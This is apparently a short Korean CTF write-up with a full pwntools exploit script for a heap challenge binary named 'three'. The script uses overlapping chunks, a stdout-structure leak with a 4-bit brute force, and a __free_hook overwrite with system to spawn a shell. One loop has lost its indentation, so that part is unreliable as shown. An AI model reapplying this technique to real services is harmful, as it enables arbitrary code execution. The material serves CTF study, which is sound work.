제한된 횟수의 heap 문제의 경우, overlapping chunk가 굉장히 중요함을 깨달음.
houseofatum에서 show가 사라지고 한 번 더 할당할 수 있다.
main_arena 4bit brute forcing 해서 stdout magic leak 하고 __free_hook 덮어서 풀면 된다.
from pwn import *
#context.log_level= 'debug'
# Target binary and the process under test.  ASLR is switched off for this
# run, so the fixed addresses used later in the script only hold here.
e = ELF('three')
s = process(e.path, aslr=False)
# System libc; the commented-out line is the alternative of a libc copy kept
# next to the binary.
l = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
#l = ELF('libc.so.6', checksec=False)


# Thin I/O helpers around the tube `s`.
def ru(x):
    return s.recvuntil(x)


def sl(x):
    return s.sendline(x)


def p():
    return pause()


def io():
    return s.interactive()


def sla(x, y):
    return s.sendlineafter(x, y)


def sa(x, y):
    return s.sendafter(x, y)


def rv(x):
    return s.recv(x)
def lg(s, addr):
    """Print `addr` as a right-aligned label plus hex value in bold red (ANSI).

    Note that the parameter `s` shadows the module-level tube `s` inside
    this function; it is just the label text here.
    """
    label = '%20s-->0x%x' % (s, addr)
    print('\033[1;31;40m' + label + '\033[0m')
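def raddr(a=6):
    """Read an address from the tube and unpack it as a little-endian u64.

    Args:
        a: when exactly 6, the number of raw bytes to read (the usual length
           of a leaked userland pointer).  Any other value switches to
           reading one line and stripping its newline; `a` itself is not
           used in that branch.

    Returns:
        The unpacked integer (zero-padded to 8 bytes before unpacking).
    """
    if a == 6:
        raw = rv(a)
    else:
        # The original body called `rl()`, which is never defined in this
        # file; read the line from the tube directly instead.
        raw = s.recvline().strip('\n')
    return u64(raw.ljust(8, '\x00'))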
def menu(sel):
    """Answer the next ':' prompt with the menu choice `sel`."""
    s.sendlineafter(':', sel)
def alloc(cont):
    """Menu option 1: allocate a chunk and send `cont` as its content."""
    s.sendlineafter(':', '1')
    s.sendafter('tent:', cont)
def edit(idx, cont):
    """Menu option 2: overwrite the content of chunk `idx` with `cont`."""
    s.sendlineafter(':', '2')
    s.sendlineafter('idx:', str(idx))
    s.sendafter('tent:', cont)
def delete(idx, sel):
    """Menu option 3: free chunk `idx`; `sel` answers the (y/n) follow-up."""
    replies = (('idx:', str(idx)), ('(y/n):', str(sel)))
    s.sendlineafter(':', '3')
    for prompt, reply in replies:
        s.sendlineafter(prompt, reply)
# Interaction sequence against the 'three' binary, following the notes at
# the top of the page.  This is Python 2 pwntools code (`xrange`, str
# payloads concatenated with p64() output); it does not run unchanged on
# Python 3.
alloc('123') #0
alloc(p64(0x11)*8) #1
delete('1', 'y')
delete('0', 'n')
edit('0', '\x50')
alloc('123') #1
alloc(p64(0)+p64(0x91)) #2
# NOTE(review): the loop body's indentation was lost in extraction, so it is
# not clear from this copy which of the two following lines the loop covers;
# confirm against the author's original before running.
for _ in xrange(6):
delete('0', 'n')
delete('1', 'y')
edit('2', p64(0)+p64(0x51))
delete('0', 'n')
delete('0', 'n')
edit('2', p64(0)+p64(0x91))
delete('0', 'y')
# The two trailing bytes are presumably a partial pointer; the notes above
# say 4 bits of it were brute-forced, so a run may fail and need a retry.
edit('2', p64(0)+p64(0x91) + '\x60\x77')
alloc('123') #0
alloc(p64(0xfbad3887) + p64(0)*3 + p8(0)) #1
s.recv(8)
# 0x3ed8b0 is an offset for one specific libc build (with aslr=False set
# above); it has to be recomputed for any other libc.
l_base = u64(s.recv(8).ljust(8, '\x00')) - 0x3ed8b0
log.info('l_base: {}'.format(hex(l_base)))
edit('2', p64(0) + p64(0x51))
delete('0', 'y')
edit('2', p64(0) + p64(0x51) + p64(l_base + l.symbols['__free_hook'] - 5))
alloc('123')
edit('2', p64(0) + p64(0x61))
delete('0', 'y')
alloc("1;sh;"+p64(l_base + l.symbols['system']))
# Menu option 3 on index 0, then hand the tube over to the user.
menu('3')
sl('0')
io()